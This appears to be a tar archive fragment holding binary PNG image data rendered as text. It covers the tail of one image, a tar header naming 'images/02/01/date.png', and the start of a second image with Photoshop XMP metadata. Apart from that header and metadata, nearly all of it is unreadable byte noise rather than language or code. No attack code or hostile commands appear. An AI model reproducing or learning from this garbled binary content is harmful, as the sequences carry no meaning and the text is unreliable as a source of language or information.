'Le��^�m<0�`>����>C��v�&�H�WT�a!|A��iD޸���=]��Ǣ��-����'	�x��)[#��C y���h�d����GV��=���������`O�Tl\�j�T(�Y��&"|>��rGϕ�r�1 Rd��BD�@K�����Q�PM��%�T=��9,"LAf�5d��l��Ñ�AZ�4���x�r�V�������!5)���T����� 1U�+q�V��jf7G��cgFkV̿m�!}J����֭ED�1�H�ER�����9�P�5\T�	3y�4�p��(}DΨ4P0X���h]�73��s��'o�	o���t*%.ᶓ�{J�Ht�`����Y���)g�f�;71cy�����n��%�z��RFR,I$����1h�c9}�>I٬�@�~���B�5g\{L������v�l����3Y�z�q&�b�7bi�9K,H���~-) �4�r�Sk;Gf_�+�cOY���ׅ��y��	\�r���߻yy�4���N%�^�@��jה��$��Dt��i�e�`�����;j��٥���DC(&ɶc*p���Π-�:�Q�{��`ɐ����)�A�#�u�!���������:V#XU�*%��y���%��Xe�?K7���8�Ͻ���v�D<�t<�F��Ij����o�ɋR9�#)B
k?3�&MɁ�kb�+�)�FJP��١��9��P�b?�N�ύ�넹���?�`�*���cBū3�J����%����Rz�R��"�BF��c)kr6�M�'3�Qf��hV����anh��(�gR�z�6���eB0�u��`�ϵIh�ɵ)�p��<�)(#�����R��q8�4��m*�}��9�l�B�����C:.Ƌ��;k�
��#��/�Y4�HicUgV��圽"`hW�q��V��@�:�Iv�K=I#GT����2��!d�P�َ)��>a���
�$}�B?�[b(9�T�'�x`ҲLØC��K��ƅ��u��H�s�^Լ��2\���h�%�9�,�s�}�Se�d�����϶�Fx�s�mS�K�
�l�؞��d
�S��9�~t��E>�$lz"u��C�VHZA<e��K���SaI�y3$KtNt-ƛT��Pb�R�!<!u��˕�����yY"��Z�h)��Vu_n�apb���L�q�T!�"����,g�Y_?�:�U�u��k�9��Cπ��k�d�ggCɓ�Dy������m֦��i�.y�X��!��_�y��e��!̇��)�Ae쉮��G
�&���{5�d��7�c��������9
���|���,~�yu�`L��{��5�]��!X��Eqo�7ח���|��.�>�sӃ\s����0�!�=:,�v�g�y�/�ꉒf�ǐ�������J���{j��)b~��W��d��-��_�FT�8����}`�oQ���Z�5�y��g�ߑĬ�M�Y�
T�T�P
����u�Z>�¡}�`۲L�y�B��M�U}Ջ2_���Sy�=���*=�d@}g�;7W���#T�\��<Lj�񔬉��:s��W4fz$�Yz�R�n�"sP�v?��v#7`�����?N����N��hVUOq����5'K���Y�6�(t�G���A#eF��	�j��-���
�.�2��I>4���sz�0y@wVI����6f�ɵh&�H��C*�3�n����%�9\�h)Z�<��!�(���>7w��yQF�=E��
����SX��Qa(HI��&s;�ݽ׏����4R�x@h�o�L��53�z�uz]\��$.�jQ�ne�w3}�n��0���Nf��j�1��R8��r�|�K&���|����T ��j���dUK��\e���4�ecS~(8�#Ѵɘ'��I�n�}h�9���-sM`��f��E˥&�vJ��H_���Y}�Չ��΁���x��r@���ޝww��<-$����Z�S
�w�����	.���>0��)�Cg��E�C�C���%A[�[%���KTA�<b���Ab
�Zρ&�^l�'_�4]�'���nt� (l̆V.�SS��jo���,���U��x]�)�$T�ꭥ���!mN�#�/�^�-`!��0:a�}��i�����m��%��b�&F_GZ�
�0,P0�C&�:F�A9��*2�E�t���:�����q�E��pE���>Wύ̵�Ts2,�1�_Hqmr��ߒ�G:��Pajك=h��W:`�u��ț���o�A9a������3�(���k$����#�K���;���n�,`��m �A4ų�������M�,"W�'����΄�D�Փ��}A����)Ii�
4�x�>Yn�:i,��>�䭇+4Å�S�:#[��T��~S��2�hi3��q���T#�,ݥL-a��]�_�ԡ�	��kr̩8���=�����`����=��g��a�U5��Sɲ������=i�QB��Ü�S%.�O1���m.�`UK��zJ:v���a��љ����
����M�bv��Hv�1�xO�zP�f)A�����~|�m��q����dJ�hwI���<#9����1��A�3Î��}�ݤ�"��A2,�B�ͼ
	��R��n�?�4��Y����ƈl�ҟ��w���ӫru�&s�� ����N72nFd�4DS�S�
�u�XG�vva����	'M�m�?2i��[�	=B�}���u��{�0y2�~Y���$wvO��Rܣo_l����YN���>���r�}��.&�Sr��6��2$�>�j���_��8�B0��7�"����r�=�m�mJ|�v
��.�xЈ�_��q81�0��m�ť��=�eGt,c,�=����e�H��o̔�����W�k[�A:@��C�"2m��H#Tp�vf�12�j;5Vƚ�6g�&���<рe�	sX�HbSõ���‘\��~K����r�������|
�n�<é"�폍�=aߐ�f��Ɨ�|��n�a��Ɋt'��$8�a`�/t�ק+�q�xTX��b���&���\0��Y:0�)�E5�n�f�Vn��i�=Vpj�w	���0����w�����ـ' ��=m��	#PY�1
{����›��Þ&�FNS�	3i��[���4�-k��\rG~X��uɀ)�n-����M����(c�>�b�(�P�W4	�wlbS�A�3��s�#7�T���@B�Y�'Z�8gF*�Z��A�����4`g0��?��CH���<W;���[�C$��=��/��L�cЉ��{���h���4ճ˚^,+�Ҫ����$��~�����cT_)ч�n����!fQ�у�٥���r��������!��)s�5�=�
���"E��H�Z�O@�S7��p��CE����Ρ���P��dNt�R�Y�M5z�)�r5��~=Mؙ��iu�W��Nbr�s��G�k}�%�zY��{�v5��iG��P	��nr��U��pF���ԗG��J1�K*3�܍Cu��Y�%	5�̇v�L��K�s n�2��2�#u�0;��\��Q�|BҶ���h�bR��IA�a�3��(��q�.l
]�΀&,�5[#�Qk��|ʲ�sbGsM��ϱ��&u�R���
Sq�x�隧U�&T�w�������Y��&��35� ��Ӌ6
��/���]K
��`NF���9b&�c���ζ<L����é�;�ьX�����)�1�d?F&���ZU4f���$8�c14�d\oN��:N�8H}�#�.ڄ�L��e#��5�`�3�J�xm��&��R�r����)�ܧn��dڨ�U$rrX���Wn�w���p��6\�|6���;-�[�K��9��r1P[���|j����ɐNT?w���%�z1�T�U*Xq������:�NT�2\��3��N���mO�;�gYk�c��=w�X�v��Ȣ��0f���j��x03ض�B�8�ē|\�nAh*i�ysld?;	b��m6�K1��&T3����l^�AZw`I��1�5�׻[��Yqr T&4�0Q�ۃh4N�ux!��)u�/��9&PM�Ĵ߄+�������ؤe�d�Ǫ5s��_�v��6�"�W��'`&
*?-��ݘ#:]���7^���`'���{���S��g�&m�f �ce ��%��b�����&�MA�^�b�w�������?��n�v"�� Ӟ�[�	X�)yy9հ���2�dm�sU��E������߾{�>�s�]\<}-�
�&�I�
ʶˡ���>,M��=
|�������:��j#����b��l�P����/_������r"B�[������@�ا"K���^fo�(��z
��|6Y�:�;�;��bd
�ڋ��@7-��;G��`��5�w'�2_�3[�V��fM��	Ʉ�a��SҗC�����2��/b�b�����q��Kju=�O���g*�|�@2`��jծ`*>��0����A$3��5����{����\/���	��u��ʞs����<p�����)?��R�"�@�~��{���CM89�(ZP$���2��+{��uMLȺ�79�9��M�q8��|���2Of�Ϭ�t�CiO#;�� ^�H�CUF��ѶM�{*P����`�k{su���nj��3��=�Dh���p�%���B��u�Y[;qoeۣF�f{RC�3�k�!�o!�()ӣ�b
sW+[Hkzp�P�#������Т��w�\�eM���b��y��YG??�������]MLZ,OI�~X�2ɟ�XHD[H�2�.��.ը9ԓ��9�'�)��HY��΂��k����Y/��l�W�;�f�eN��VO@�n��e�%~̎�c]|I�p����Ζ��~�xG�%!Х/��jݚ���^P3N7�? �̬��e�^ƙ��ຸ�1�2�5��qԝP�l%2�?��í����R�cɳ��ިN�x����5s�bW�\���Ξk#)q�bR�F�P$X��+q������,=[�gʹ�L�_j
����X�Bh�RA�ļwGT	��,"'��DH����7l�X���ixbJH����:S���:^�N��kz"ZQ�8�Vf�1 ������#�|ps�f�e*�H]
�fs=-{b��M�boۭs�ղ�y�����9ؠ�16��9'�Q��8���YY�7�Z(��Ʉ�q��M�ެ<���;j�̐�iv�$E���l;r#I6dr)Is����2�"�@D�j�O��R�bq7���/�[ɒ�
�E��y�0��׍�A,5Hh�M�[2h��l��<I���"�v���nZ�+��+��(D�4��i�����yм�qQ
���d�����vv��"d����Oy~>���,S���	���b�Z�"
-/��e,ν�z�Y�4����6`xЯ0�ք�I~��9�$L�D��-L4g�i�Q�ͨ��u��4�Mf2�!�a���a"�ġ�[��T������BG�Rd��m��b���x.6�,ӑ�֚Ij~�?Al[��6q(��m�8��A�M��d�J�����"��Z�Yqh�Zm��wq�ּI��g{�g�t�ٺT�ȝ��=����1I���V�.�J�����S��ȧ�Ӷ���r���	bw��5]��y�2�̆1U�cb�s>�˅P=�n�?�1*�⨽��
�Ծs�Q�5��ۊb�	�Tqz�am�')*��5�9{AfF$������l��E���D��{��s|�����9rY�UM�1�&�.�}f'?��Aʸ��+.	�Wz^DA�&�D�I�
2	X�)7|��	ZW@o�>b�#g�GQ��u(�8�J���zMB�t�q��Z+�R΀n���KG��A�
�9"YapQ�{mr/2i
U�nn',���Y�Ő�$ĦE9f�	�\g��@s��JK��RW�@��`5&V�?Ӫ��g�Y�
i��
�Z�h�
3�}���)o�.���*��b�	F�B��*]����7B��JLJ���L�r�&�"Ҩ��5�C5Mܣ���]i��t��y�+�}��$����8����^���`8y�YX���<7���:LY�Uꏃm��D�F^�o�����wˬ��GE��#Cbt5k��h�)SX
/�҉�s�qV�tQRAlwD�-�]�`�&�(;)5P�[Nu@��I��P]!+ĥPb׀cБa+�Zl�\T�TMEA�u����y����1}����C�KW�ʐ�\�6�7�9�(�9�+�����J �H�Of��Ǒ��m{$��Iu�.��8�Fg����̽
âL
�_�.���=z�	9�7�&c��te֕>��
nVɦe	�Y���o|��[3�F�xN�oܵ�@��v\l����烓��&$ߥkBC$�k*�x3��ݙ�B(��X�%m�,��i�?�:����&�m�?�3����H+J�U� �������:<"��Yz�M$��^Eg�۟�T�8� �
��[@��2²�i��9"���8V�
�e�\�pك���k�I�7�r�|�B���(i��B�^�S��S�S^ї���8΁̒��5��v�s��+���̈]J��f���a~`�ȑs���l����ħ�J36zwN�f�(ib}��Y��D�>�؆X������Q3�Š)*4����d�+;͚�Y왲3�Z^v��������b��r��
�����.R߉�Y�DDa�"Đ\7�x7�3;�{�%��떅�X�L��N�m'&֞ߥ�$gÙ�;�(<�#�#��=aN�]�3 �mK3Iz�5Ɉ(R����j��<��{�Ls�-!j\X�r)f�����)2I\(��w)3,�u4w���,I��e���-�u�𼩈A��6�)�b�\�.���Qs�6��\�u�P��+�6
ʦZ�����,��IUj�HU^�߈8U�,��RqQ2�`h^��~\K�h���� �`K�$��P=�;f�,;����ISQ_�}M�E@��3F�u|f,!p0J�Lk�9�]韗2�9���zK�U������tj�K~g���?�&����,��҆u5�|z�p�A���jGP(p�4""_?�P��e:��7�MH>�:�x9�g �J��h�(N"B}���@���:����m�)Ϲ�N�7�1ж��;Ό��#����T�6}���و�����y�ȩ_�E�y��ٹ�)�ڕ% �B��;i���h,���̵%/���͈���m!�FՇ��-� l�3��^��Et}k�ֺ<�CN;5�TҔDa؈�n��Q��n
�	��4k��[,�
���|W1��d�V��.��Z:���|[����<^��l��gʋ�9�����]�
�0���u9,"��
�>��b~^�gdj6nt���sr=��".mϭ��X��\�5�[r��N�*����\9:9�է����,�
�}\d(T�qa��PZ�Ϧm
�>
V*�U\��.C��<��O���
.�`p���u���~�O��;Z��369h�c�n�
 �r�ǂ-&�AU�<�h:?�E5û%��
��sKP�|G�9|��.S�OC���K6���==u���Ls�p�xh�'�}��v$���E�W�Fx֧�/��6y��*2�?��,j���*G;��B�=�y�5�#�*�R���F�k�M
2�����c�������*
��TnQ�ʜ^#�X_1KoTm��f�����ŴW������bQ�����I�1e�ҭ��la$8����T���c�H �R��Ĵ�$a�3���{�o6{���Zl�	tk��0�I���ʑ!|�W��`�2i-;}�;���d/�!�ʢ���5��h2�z�%��l�1���RYJ\�p�=h���T��6�"�;\���t�#�[��F�Y�B�Ѩ*]���<��B�ޞyɥ�4���Bj�šx�A��c�����ܸz��sE�	2�m�c%q^��7�1<��6�gC#	�H�$��Y�Mm�pw�1���@^jX0��}	bs��P�f ӗ<���7~�{��nĢ�p�f�����Bϳ\���I.��-�!?���U�P��WIX��v��OTШ%b\_e s%A�:����	�>��~�]3n-V9�US�}qrY�m͕�u&B5�V6v!u*��g�z�UVr� �%�X%TCC��K�{�k@�U�gt˒���0"1I�;�?�������o\2�n�IK���ת��6�������Y��Is䧙ն��gl]Tܫ)_;ޱ:�,zfx��FW�s�0�A�C
�=C�Q�Q�|�0U��T
G��X��Z'�HB�+ύwpHUv���^�N�<V��yԳ�ͫiFJb�云�]�A�pb�&W�K�6>�t��:�?D�g"�Se�8��i!�<Ѳ��>��i�qI�%ٌn0"�9>mᨈ<���/��|hd7l�r��Q�����	���ɓ�V��|+Ɂ�M�<����˟�K�Ki�i
�Hyt"�^3u�u}���u�y
!���y�����\�`��N��}���ğ��x�8ʟ<f�[!
���\OHT�&�ѹ�6B�$bD��x2�H�y�V�v���;�#���:U������s�(���i���m��=�O��a��[嵞Gj�hHYIpU��#Şy9�\�6��CoH��[���u;�ů��@4���0�����I�Ϩ s5��B.�O�>gb.���P�A��A��<���������)�u���� $P���!a�`�y0�mf���֢Mok�S�Mℵ�C��)Ǟ5���,�XB�c������b!̷8�7�8��RT#�5�$AE���q!����݅(��,>⢇q�>��޼w�����i}��n"�^|��Lo��XHl�ԣԂ�`��C�`e99=����g��l2��Oߎ��_�ʯ������7
Z��;�$}���%dP�PMs�y�"i��&��0�.t�lyK=����Fk#L��=*�nM���K�G��]�lN�=�e��X��kJ�8�:$kS�Κ�����F����TQ�bo@ϱ����d�e0��)���Kr#Dx*���P�G�;��/fN;}J��a����[��ł<���0�-���$��g�I({r4���һ�ؿO���a�u2hk�"@��Sr�l��	%��������d�)�9s0/�_>�J�b@�lBa"�s�QS�;p����~e1zs��Z���7R�reAۨf�}��7��2Q��b��wy�N��Ȏ�6�r
^2A�l]n]��yij4h\�qn�D�f3����T��|�2
ݡ���+����j���#��in�b7��SB2GA
P�Qf�B�=�}��A��yK�=R(�$y��u ���N��S�c���!�����w���/��ߤk������G-,5��ߛ����UU�vI>h�&*�0�4�N
�Q������r�H�v,o�s��>������d7�}\�,\k�fu�W�Ϭ�}��B�A=$��Y�+h�PS�[ˆ�.?�o`�I�N��X�4҈9%|U�y�x�*[����8��MR�8HF�:"|��'Ş~��5M!/�LIh�E���1C��i��-����˧�����O��G���"���ظ��w�#��T���%�.C��	�a6��M&%�g�MW9�A0~��H�Ő�V�A��k�{�B��"s����(F�Ћ�^1���g �/yW�ĥ�^Ƨ(�KV}&M�&g��H%re�*]dT&1�q:W�8:�)77�ʕ��L0�ME�Q*^4s+����42Y)S��G�����?ǡ,�,��ս����U���w�����y_�a�ӳ*/�G�)w
f��oB��C)��I���P�<vy�;@��I�֕��l�L�B��%�Yc�2܁�]v�̛f��eYz��e㳢�,�<s�ma2���hH�U\H[!{,h;�����z��flq2	�6�|&f��QH!�r;��w�0&�*����C���
(`^����������U]��H4��l��Ę��r9���Ey�o|��n�ʬ��o�	P���AT��c?��%��hX�o)��&�O�3Fr�� �ȉ��p?D1����NV>Eʛ�#��1�!�)Ӡ%���1Kwes���
�����7n��N:�]N
��;/�����~\�2���R�Qm�s�z���f#74m,C7���E0@턿�Mm^�2���]����ԊU��X�	��0dl�q�Oi|i���i�kF,�����Pv4���^S���,�����TgE9͠>��N�����I�%��Y�`ꯙ���t=���eV��H��=9���1�0B�f`d�J���� siG���p�
؇F���
���g4S�YK|��跸�†4�ͱh��n���P�"���s�K�1ms&z��`舵�[�)z􉑃MQ��G�`l>U�,��9��D_g]	O8;��&%U]
�Z�&��
���T0su%82w��R�HE3�!q�oM	L����b�ͷ�遉_{�ڭ;��v6I�L�b�8��T���)ɍ緈k-3����E��E3m E�܁f��uu��.4e�B�Pv���S~���u3����Ƚ���s�c7�EЀT�(n|+�:�[�Rt�����J�n�v
{������K�O"�Z�ا�v
I��
�>�5�T3��f%�)s`�G����8�l#���Ƭgv�t��x���a4
?�vh��M��"?�
� yF�֮��)t�^�h�W~�a��{��&�5�ɑv�#۟(ld<��5�(дR�/2��EG $�r��k;����Of~{��c�
��+�x�¡�_���BZj�=Q+�A�d_�?�5m�tĉ-�5)���+��4�������paYم�*a��v^���'%REd!��
�̋���D��t�צ �z��TJK���jh��3��n� 
��O�"�L]D��i68b�Y(���$)�\먺�[�����kAsC2'�^[�y�a�k�&@��QY�t�F���]t�h$�K��D�'^>����jw�e�l�'v���*���iQp�&�
$(�p -�w��h8~��60�pt�*UxX��oHy��Y5����\����P�Z��%E"����m��A1�	�{��z�'@'�i�@�[BwZSp�Fv ����|z
�>��!��&��*��2�"~��̌o�]4y����ą�q�H
������/���֋|����F�x�$.^v!ߋ�-�|=rl3���\*>G��SK��u���!�9-bKQ�#�3�
�Wϙ�Y����C�+n6�@U�&��R�����u�F�k��2 [*µ�7A�rg��l�3�8q����3�Gp�H�,𚘊���F6q��fjr>!��^�1ӄ5�..A�d�A|�τ|�JT���2��B�1��̓f51.
��}��"T>k�9�_�f�V�k�Ěh$�}����\���s�)8ך����(����$^�l���f	�l��X�3b�!��y��lSpΔBO��dӳ����B�5%�+73R(�i��.�<v�n��m<��Pû�D�ŜmU��Ǽ0���;Λ�g��I`��:��VO�.#�|�M��ܒ��z��-	�`���Cd��]�\K�`BEd����K�u�*f�K�B��*�YU�J�~�ft/]��c1v�bQK��
]�\_��u?^+~�8f�����m�%h5�ɳ@��.��Z�C�;��U�%)6.PT-��:D02O���{�&�<:d&���z꿯T�0_G�E\@Ӟ�hr��$�U�88��yֽ�s|��C�J�#�Ӛ�g0X��E
ڎ+N�)/�������~ࢌr�D��B�6��E�*��
�0�"!��nˑ�WL(7���`�3�/�i��n�+b�a&g̥�Ϣ�c�'
�6�͒3p��[��G!�^�cS�i-��a|�gyz$Y%�O�AwH��}����ZG��d>GEm}W�,�d�LX8�R�0 %��C�=��\�ꜩG��y�b���kY@��$H���E�|��qq>5�o*wYw3�c������$���b���sf�0�:`��L�D�1��ƥbA��)md�ʱ�VEhӥ����8EZ��Ԅ�����	
-AOI��}��v��+��O��<��f�J��x��`fxQ�lk�/�-��熂�;�_�v����a�g!�5s9x# 	>z�Χ�.EQ���}#�έ�I>�� �I��������|h���HA���V�L��Mh�ѓ)y"vB����}Pa�1����RH:�F�8����'R�l���p9�
�gzHo*<E?fs�#82���?�Ca�U5�-��rp'��gf��j�.�:����I��v�)��]s�)�dB63�.ٺ�tԒy��<��e�";8��s�sCT�����п�\�S;��s����5��ڒ,
��Wn�@��f���^U��R��d�;�����?*�7��
;��a!��حh&�CZ��`QpŐ6�n�<>��^ZSM&\5�ɖ4:#<��H�tJS{o���\M�y<��la�=�Cd]�V��`XH�k�����|�;�'� ��Ύ�
�GMs���mi!�;�Hn��<7���@��,��mj���2`uIX��J!4��,&
7���J2��2�i�1^��P��iБ���L4j"lA�ܘ�S�2��g�KAD����mK����$�U%W�uivL>�L �I�Ɓ��씫T�I��хq��Q��Rag�����z���	p����a�|p��)~5|�u�b�[��ǖ0�Q�rS����W���P�!;P@�1*|�Ho����VD�;���V��X��G�cc]��Ī`B�y��� ��\�p>��������fX���b���y��,E�0�u�5���_�x�d����{��ͦ�qv��m���
�.����dZ,�ZTD��	�
�HϚ+�W�b������dǐ���.�P}WV�"㤉H͗x�**�0���2��̿��L�ɮ�@Xb�I���d����$�A0'n�����}��r
h"�ɻ�*#����\���,�+��(��sѩ�|k��&)�Uz��0��+�ƍ�os:���Ps��B��rx�e���k���*b`�1�f
�Y�?;�_X��L�x=�"�r�q��l��՚����0c–`+�a~�D"�)~�jSi�4˒�i$E�3;�ue�[6�#���E��V��~�E�z2e��7bl��E>��׶]*�x�Yj3���S6v� �*y!�����;+�/6f,����u�9�?׵!l�*��fX��tw��������}Is<��H���XŪ�s����]��c�/<~�����~$�@�Kqy�َ����2z�uIv� „����������A�T�O:�Q]Q���d�'��޺ ߉}�@F�Ƽ^�
*��	�j?��ő���԰I�W��.���9|����NnT ���F�ҝ���t���OiV��cq�^D�R�
�o�}��}�a��W����n>��Xo�m�[�i�d�sԮ����RF�@�-�P��%�r������8[�doS✟Zo�`m/�'j%���N.G��"|�_4+9���P��}R̀'����J1�8]#���-���{��ЮzY�ҫ�3Ǻ
�=�؏R*i6��&��!y����|�(��"���/��0)��'C�)��6� kiF�"I�4[e���Q��kLPg̈́1����1��q��c�H�")��-`
T�ۖd����<\�e�Uiǧ����e��N����f��2��z�b*��7S�1Z�S{��Ǹ�K�t7�g�;��1X�J8����@�h��.�
�E���
>�����p�z3Ԡ�̼g���m1�T�Aqp�Ƌ-ŧ�4�"�
��YR.�xŸk���%-��!##v2�D妔%�ێ��m[�r��HG'��i�E�Ӯٷ,��n��ei�14o<�C�b�
�pG��Cd,�xV����PR%%Z8G���^�-9�O��"(|�I�w�ez�E[S�ô(�1�b9C7[I"w{��H���W2�M�*vK� JZ��~��ε���p�P��8�V{��y���ףmSu^hN���j�^ o�6�X�����%5�&4��Njz[�n��}�|��J�C�/�]>����u<��C�O���V�����n%�Z�LS���a��J�>~8.vÀ��H�kI��eR��u3I�v�s�TM�#��ѭ
��g �E��B���4��Y��`w�p�2�}��B	q��δs���� ���)�p��u) ��@9��0[9�/��_�#+�+K`��Y���BA��lv��W���!q
�,_���!=�_wE�� ??�O�MԞ��e��^��vՙ��j����*��� �!S|���RnE��:WSW�KIR����-��`�~r_��;����x`ܶ�η%{7����rMul�\t��՞B�����P�C��E�h�B�KW�
��E��8ԍ�0�_צ���@g�
F������MU�V��dE
o�%���{�tTkF�U���7g��̰.Ô�.�X��l&�$��SM�̀�➨��A�@3���)��>�5��[W�u��6�q[��:q���Ϲ��ݮر�]l�̹$�O�u�cO�_|�$GƫB��y��˻9� �V�G�k��轮����?o<�&9QiU.RKHY���W�S�e�����LD����e�z�H��b��0��rV��c�r�M�`���r�aF�0�I��!X��37p썿?��h�g]�p�Q�L��.f��)}p����!'9"��P�׌���HbC���C���lt��&���b���J�B�ם�l��}���
��	S���J/p�"3<�:�ǼlM�;�,p0B11P)N�ؤ���V.Fo�t�����y�)a�M��B:�6h콼r�ٖ�!���F��p�y<B-�,��%�Ύ��+�5B���<�V����������B??��N�����{��.�i���a���j��	�4e�Q���k��_����#�&G����sNT��C�@���Ͻm������y� ȸH���RuEы���W'}M;&f�Ғ��H �mK�,���HRY̛�V�J�[t�<,����Hވ�%A�1r�fu����[\�J�����"C���������<D��4�p�H?Z�-��Z�����p\�)3PG�\���;���0��=���Ԏ�\���\��d�;�6����f�9�)"6�ÿ-��v�	X�4���(�y���fq���@v�n��c?�p�����C�̨s���`S�G~晟�ϝ�R*X`U�g�K|��i���
��
$��V��i\Q�K;~�n��X��tPF�=��
�6�p�h��s�����Mp���C-�#;��x��U�N�r
��E?�ʈ�H5ܬR��G$�H�pJ�yD�%X-骝FU%_:���D�����qȬ��E^mj�P�M)e�Z�_�c�ĪX�-g�e���]��v2L�e��
�`v�#[B��77�ks����!D6c����{�$H�Bю)`E�r�!���‹P���t��H;�(��^�Ė�ׁ��s��,(���Yu�p��2�?�S�P?dGSг��?�k�iM�ƙ]�e��������<�P�hɞ��}t�ĭ��+%�A�vv����
X�y1��=GQ�*�Y�Deʊc:�<��\UW\�-��g�˔-(�0?��蟟o�/īP�8��k�_
� ��E�^#��x� "N�B��e0��ly��KqS�=��\�*u҈
��V]u�,C'x�7�d|����c!%�탒0n?��dD3��
�&�$G"����p�Xh3,4|WB
�=Y�[u��u�E��9��Mg�\m}��W�)�)O\w����0 ����‹V�9e���Sr�ۉK�i�w���`��Ld��_	#R4�8�M�{���[S��N��yY�Ŧ�{S��>���V����qVnq��¤K���U+r����A��}������-�<7�4�_i1�� *BUm0k�9�,��΋}d؁.#�B��ň&��?��+��n�nS�V��L{C�#��L�A3b�@�����oX���lW*Ah�,c/kuv$s�͔,��l�?�TE]�ʄ�f�joh�O�B�D��`�N� �E������/
��_� �<6B�qN�O��Y�ut�`fˢ�~�/��VJ�~�X{�)&pK�'�(u�fL�*���{��KOC�������]����E���}U(з�cVS�”iR\��Tc>�%,��=��)�* �`���ے������w0�p�F��J�?/My��,6%H9�
d��l��5��a�h%������L�P���b�x��ZS��k����fx��Oy@
TuYӑ/��R�p.H���{� �|h�W3�E�j��VFxa��Y/M�:���h2bQ���[�8+���*
���T���"xp��{Q|M�k��,�8.����{����B}p#s�eN#4�6I��%[����������KCa��לi��3i��:��
�9��0�.?��V�º\���84-�d�Y�[��Ϛs�%���L�
������)�'絫sg�(T����S�v�M�m%+��[T��Ԉh�N<XtpV(n+?1����V�\����rW��y��?���Y�zn��U䳞��
��hL�%�
�3��T}�A,*�
�H�X]V��L�6�s�܏��j�0�?�.�$#��Uʿ�
�D��85Up\t�`��"o��Q��ڡ�<��w��Y���ET��.�"�����\#Qh	d%���f��O�A����@@$@�+%H2����@�tP��+���O0��mʷ��|��jΣ�?��ܖ�G��U�ƨ����x��������s�R��*����
�a��吥��/��XL _����L�:���DL*
��U;��ԙVYNkx{�Xk��Z]��ľ����y�?(Lc:�I�7�OZz�YAdQ9�Z�1(
�o8��^;�{8�������L\l�uM�̦"m)��:�lBԲi8�R���1��Ztw[���N"���]�jr!�������c�J��*1+>D�R�T!�5q(��0)'7�rM|�*��5q���8(�L��J���A�X��ǚ�m�ܵt6�l��#��2���4+f��gMź�Ëez����-�Nqs�t�?虜:��@�>}��#ܹZ_��b.���X�W���qi�
wW�[��z�#/m�I������@���*J�
U��J��E�[��0�+Z�����Y��!�[����$@�E�&�|�%x�$B�E�uuC���[���v:@�r��?gǁũ� ry��c1�ij�r{� (������x�K1Il�E�\�،!e�/R���0,�=>{s0I�$*��`�mjI�ׯ,�C�@}���DcJG\2p��B�b"evp^+P�E�|e���2@���dm')ô�k�L/�
W8T�����u�S��9�I{�{��O
%�ܨҶ�#�;<Ģȃ�u���65��v��h(F��*�/�M%�*^@�%tu���.GŜ�������߰�,��i�~�?�BWkK�';=������u�/v��a�)�!SpF8��p�p�����P��C��c�ä�Q�K6؉ɬ��t�[��V�G<��$�S��T����C�G�-���7�N�$lU�?&cO��g�Ev�(2����3)��vU����5��^/��X������v�+c5�4��,Tb��rQ3ҥ��[؜���3 �~�	��;�p�s��?�@p8��,��w�	MXZ�OVg�d�X�`��"�&^�V��2��uF~���~�r��8�)nj<e:7�����
��N�K�.�f���)��0�iH��F�ɮt9kJ�zi��d�k��7�SVOuP��^��5��/�IZl/g~d�sdq������@��~��6�3���G�s6<t �$͙�TK(@g�����M����$2�@����5�QL�w:�����|���<*����\���b�����g�!�������mڴ�_ߑpr��5��fI�~f�B���|Т��k|�e��/\ұ��b-�o-�A���w��r@r�4���^r�}@\��[���hz�)M�A{X̪��`�S�15��!�)�JT��"%�/+->��uҧ��.�jc����EDɠ�Ghsߞ�w`G�ET���l\~MiLa"�����1.���ަy���1�4�i�'���|�F�D�#�h��nc�/ɛ�q��κ��C�$���)[Jdvѱz�z��L�aW�Q�0�.I�bȃ)*yR�az�#���`�0��V�fȄ�Le*T7N�[r���a�~*��.V1sW�����-j�qn��)>�LkO~�!�	��׾0�܇,�)��W����g]���?�~ٓ.'��ҝ�ܺ)55eQ�V:��<X9��� $�~��sM�ju,g�-c��l�x���.����f�s���"�8T�[��y>�!CE�����/ �KF=�o��eι�������2Xt�ϷP@��,{�|�Wa�5r<Į���^�(B����3-�t� U��9�$�Σ��X�?)K69�y\d��סwFw˟��b�L��&� >��i|hN�1]#�	���H9�9A�\���+��C���S�`#�Fy��׍D鐻�,�����_��Ls��r�<��jW�L��8��v9M�0�J�=(+j	�ۖ����4v��T?`q���l+��%DqW��:.^ǂd�*����t���U'ȹWk�\�M�#:Pi��8dċ��U��;]G�ݡ�z_�x7�9����j�1��vطU2v0�Ƃ4�ـj�3�`f�%��$��c�T�Q�Y��f2"�U�����v��������r�˪&������ �
�j�kLc
��"������	�lw(=��#�����e��`[�]�9b��l��ݾ�����b?t�WY��Ӎ|f�UU�d�t�[�yZt*2�&E�B[�%d�7+���U�<sO���)&�M�؇��:ku9��V;���Kd#��
9B5�I47�"��[��Q�Aj��&rYdh/]H���
�#�p���yn�2�V�}�P�*��O?��"X#��_>N���B/
��D;Yp6%�U?2]	gr�^�}�����k�0�Ҹ�ι����8l�Kv �U(���fo���$Ϩ�{�F�?���:~�	���x#g3��L+4�8h��[���D"�!�_���@3��&*��O"Y]︁��#�]��`�0�瞦B@���R���@�Un��rō6끸v=L`E��F%F5�i�QN"�YS�D-��
���:���
0P�8�=IEND�B`�images/02/01/date.png000060400000004003152434416630010076 0ustar00�PNG


IHDR�A�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:2EB424D3210611E3B397928C9795A3E8" xmpMM:DocumentID="xmp.did:2EB424D4210611E3B397928C9795A3E8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2EB424D1210611E3B397928C9795A3E8" stRef:documentID="xmp.did:2EB424D2210611E3B397928C9795A3E8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��c�wIDATxڔUOLU��͛?;���‚�]L[Y�56��H�64/��x��^=�ɞl�C�b"\8AҞ�)�&$�Z��@�l	t�e����M�J�D_��y�7��ߟ7ҩ��S�-Ǡ���v'>眧�&f?1�W��
